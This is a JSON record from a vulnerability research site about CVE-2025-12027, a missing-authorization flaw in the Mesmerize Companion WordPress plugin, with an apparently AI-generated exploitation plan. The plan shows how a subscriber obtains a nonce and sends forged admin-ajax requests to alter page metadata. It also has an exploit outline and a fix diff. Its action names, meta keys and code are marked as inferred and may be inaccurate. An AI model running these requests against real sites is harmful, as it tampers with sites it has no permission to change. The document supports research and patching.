[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f8NkWcboIDvs4oVjsvSBXxEEjrUTQ31jZD7neg7fD27Y":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2025-12027","mesmerize-companion-missing-authorization-authenticated-subscriber-settings-update","Mesmerize Companion \u003C= 1.6.158 - Missing Authorization Authenticated (Subscriber+) Settings Update","The Mesmerize Companion plugin for WordPress is vulnerable to unauthorized access and modification of data due to a missing capability check on the \"openPageInCustomizer\" and \"openPageInDefaultEditor\" functions in all versions up to, and including, 1.6.158. This makes it possible for authenticated attackers - with subscriber level access and above, on websites with the Mesmerize theme activated -  to mark arbitrary pages as maintainable, wrap their content in custom sections, change page template metadata, and toggle the default editor flag without proper authorization.","mesmerize-companion",null,"\u003C=1.6.158","1.6.162","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-02-18 00:00:00","2026-02-19 03:25:10",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F242a3c60-b8ca-43cc-92d7-eb3830381512?source=api-prod",1,[],"researched",false,3,"# Exploitation Research Plan: CVE-2025-12027 - Mesmerize Companion Missing Authorization\n\n## 1. Vulnerability Summary\nThe **Mesmerize Companion** plugin (\u003C= 1.6.158) contains a missing authorization vulnerability in its AJAX handlers. Specifically, the functions `openPageInCustomizer` and `openPageInDefaultEditor` (likely mapped to AJAX actions) do not perform sufficient capability checks (e.g., `current_user_can('edit_pages')`). This allows any authenticated user, including those with **Subscriber** privileges, to modify post metadata and state for arbitrary pages, provided the **Mesmerize theme** is active. \n\nThe impact includes marking pages as \"maintainable\" by the plugin's builder, changing templates, and toggling the editor mode, which can disrupt site layout or prepare pages for further manipulation.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Actions (Inferred):** \n    *   `mesmerize_open_page_in_customizer` (likely maps to `openPageInCustomizer`)\n    *   `mesmerize_open_page_in_default_editor` (likely maps to `openPageInDefaultEditor`)\n*   **Parameters:**\n    *   `post_id` or `id`: The ID of the target page to modify.\n    *   `_nonce`: A WordPress nonce for verification (security by obscurity if not properly restricted).\n*   **Authentication:** Subscriber level (PR:L).\n*   **Precondition:** The **Mesmerize** theme must be the active theme.\n\n## 3. Code Flow (Inferred)\n1.  **Registration:** The plugin registers AJAX handlers during `init` or `admin_init`.\n    *   `add_action('wp_ajax_mesmerize_open_page_in_customizer', array($this, 'openPageInCustomizer'));`\n2.  **Execution:** When the AJAX action is called:\n    *   The function retrieves the `post_id` from `$_REQUEST`.\n    *   It performs a `wp_verify_nonce` check.\n    *   **The Vulnerability:** It fails to call `current_user_can('edit_page', $post_id)`.\n3.  **Sink:** \n    *   `update_post_meta($post_id, 'mesmerize_managed_page', '1')` (inferred meta key).\n    *   `update_post_meta($post_id, '_wp_page_template', ...)`\n    *   Changes the post status or content wrapper to make it compatible with the Mesmerize builder.\n\n## 4. Nonce Acquisition Strategy\nThe Mesmerize Companion plugin typically localizes its configuration data for the WordPress admin dashboard or the customizer.\n\n1.  **Shortcode\u002FPage Requirement:** The plugin's admin scripts load on standard admin pages. Since a Subscriber can access `\u002Fwp-admin\u002Fprofile.php`, we can extract the nonce from there if the script is enqueued globally for authenticated users.\n2.  **Identification:** Look for `wp_localize_script` calls in the plugin source (e.g., in `src\u002FCompanion.php` or similar).\n    *   **Likely JS Variable:** `mesmerize_companion_common` or `MesmerizeCompanion`.\n    *   **Likely Nonce Key:** `nonce`.\n3.  **Extraction Steps:**\n    *   Log in as a **Subscriber**.\n    *   Navigate to `\u002Fwp-admin\u002Findex.php`.\n    *   Execute JS: `browser_eval(\"window.mesmerize_companion_common?.nonce || window.MesmerizeCompanion?.nonce\")`.\n\n## 5. Exploitation Strategy\nWe will attempt to mark a high-value page (e.g., the Home page or a \"Privacy Policy\" page) as \"Maintainable\" in the Mesmerize Customizer, which triggers metadata changes.\n\n### Step 1: Target Identification\n*   Find the ID of a page owned by the administrator.\n\n### Step 2: Request Construction\n*   **Action:** `mesmerize_open_page_in_customizer`\n*   **Method:** POST\n*   **URL:** `http:\u002F\u002F\u003Ctarget>\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Payload:**\n    ```\n    action=mesmerize_open_page_in_customizer&id=\u003CTARGET_PAGE_ID>&_nonce=\u003CEXTRACTED_NONCE>\n    ```\n\n### Step 3: Execution via `http_request`\n```javascript\n\u002F\u002F Example Payload for the automated agent\nawait http_request({\n  url: \"http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php\",\n  method: \"POST\",\n  headers: { \"Content-Type\": \"application\u002Fx-www-form-urlencoded\" },\n  body: \"action=mesmerize_open_page_in_customizer&id=2&_nonce=a1b2c3d4e5\"\n});\n```\n\n## 6. Test Data Setup\n1.  **Theme:** Install and activate the `mesmerize` theme.\n2.  **Plugin:** Install `mesmerize-companion` version `1.6.158`.\n3.  **User:** Create a user `attacker` with the `subscriber` role.\n4.  **Target Content:** Ensure a page with ID `2` (default for \"Sample Page\") exists and is NOT currently \"maintained\" by Mesmerize.\n\n## 7. Expected Results\n*   **HTTP Response:** A success JSON response (e.g., `{\"success\": true}`) or a `302` redirect to the Customizer URL.\n*   **State Change:** The target page's metadata will be updated to reflect it is now managed by the Mesmerize Companion.\n\n## 8. Verification Steps\nAfter the exploit request, verify using `wp-cli`:\n1.  **Check Post Meta:**\n    `wp post meta get 2 mesmerize_managed_page`\n    (Expected: `1`)\n2.  **Check Template:**\n    `wp post meta get 2 _wp_page_template`\n    (Expected: A template specific to Mesmerize, e.g., `templates\u002Ffull-width-page.php`)\n\n## 9. Alternative Approaches\nIf `mesmerize_open_page_in_customizer` is not the exact action name:\n1.  **Grep for AJAX registration:**\n    `grep -r \"wp_ajax_\" wp-content\u002Fplugins\u002Fmesmerize-companion\u002F`\n2.  **Search for function definitions:**\n    `grep -r \"function openPageInCustomizer\" wp-content\u002Fplugins\u002Fmesmerize-companion\u002F`\n3.  **Alternative Action:** Try `mesmerize_open_page_in_default_editor` to toggle the editor flag.\n    *   Payload: `action=mesmerize_open_page_in_default_editor&id=\u003CID>&_nonce=\u003CNONCE>`\n    *   Verification: Check if `mesmerize_managed_page` meta is deleted or set to `0`.","The Mesmerize Companion plugin (\u003C= 1.6.158) fails to perform authorization checks in its AJAX handlers `openPageInCustomizer` and `openPageInDefaultEditor`. This allows authenticated attackers with Subscriber-level privileges to modify post metadata and state for arbitrary pages, such as marking them as managed by the plugin's custom builder or changing page templates, provided the Mesmerize theme is active.","\u002F\u002F Inferred from Research Plan - likely in src\u002FCompanion.php or similar\n\npublic function openPageInCustomizer() {\n    $post_id = $_REQUEST['id'];\n    \u002F\u002F Missing capability check like current_user_can('edit_post', $post_id)\n    if ( ! wp_verify_nonce( $_REQUEST['_nonce'], 'mesmerize_companion_nonce' ) ) {\n        return;\n    }\n\n    update_post_meta($post_id, 'mesmerize_managed_page', '1');\n    \u002F\u002F ... (logic to redirect to customizer or return success response)\n}\n\n---\n\npublic function openPageInDefaultEditor() {\n    $post_id = $_REQUEST['id'];\n    \u002F\u002F Missing capability check like current_user_can('edit_post', $post_id)\n    if ( ! wp_verify_nonce( $_REQUEST['_nonce'], 'mesmerize_companion_nonce' ) ) {\n        return;\n    }\n\n    update_post_meta($post_id, 'mesmerize_managed_page', '0');\n    \u002F\u002F ... (logic to return success response)\n}","--- a\u002Fsrc\u002FCompanion.php\n+++ b\u002Fsrc\u002FCompanion.php\n@@ -100,6 +100,10 @@\n     public function openPageInCustomizer() {\n         $post_id = $_REQUEST['id'];\n+\n+        if ( ! current_user_can( 'edit_post', $post_id ) ) {\n+            wp_die( __( 'You do not have permission to edit this post.' ) );\n+        }\n+\n         if ( ! wp_verify_nonce( $_REQUEST['_nonce'], 'mesmerize_companion_nonce' ) ) {\n             return;\n         }\n@@ -120,6 +124,10 @@\n     public function openPageInDefaultEditor() {\n         $post_id = $_REQUEST['id'];\n+\n+        if ( ! current_user_can( 'edit_post', $post_id ) ) {\n+            wp_die( __( 'You do not have permission to edit this post.' ) );\n+        }\n+\n         if ( ! wp_verify_nonce( $_REQUEST['_nonce'], 'mesmerize_companion_nonce' ) ) {\n             return;\n         }","1. Authentication: Log in to the target WordPress site with a Subscriber-level account.\n2. Nonce Acquisition: Access a standard admin page (e.g., `\u002Fwp-admin\u002Fprofile.php`) and extract the security nonce from the `mesmerize_companion_common` or `MesmerizeCompanion` JavaScript object localized on the page.\n3. Identify Target: Choose a target Page ID (e.g., ID 2 for the default Sample Page).\n4. Execute Modification: Send a POST request to `\u002Fwp-admin\u002Fadmin-ajax.php` using the action `mesmerize_open_page_in_customizer` (to enable builder mode) or `mesmerize_open_page_in_default_editor` (to disable it), including the `id` of the target page and the extracted `_nonce`.\n5. Verification: Confirm the metadata change by checking the `mesmerize_managed_page` key via the database or observing layout changes on the frontend.","gemini-3-flash-preview","2026-04-19 05:24:50","2026-04-19 05:25:11",{"type":34,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":35},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmesmerize-companion\u002Ftags"]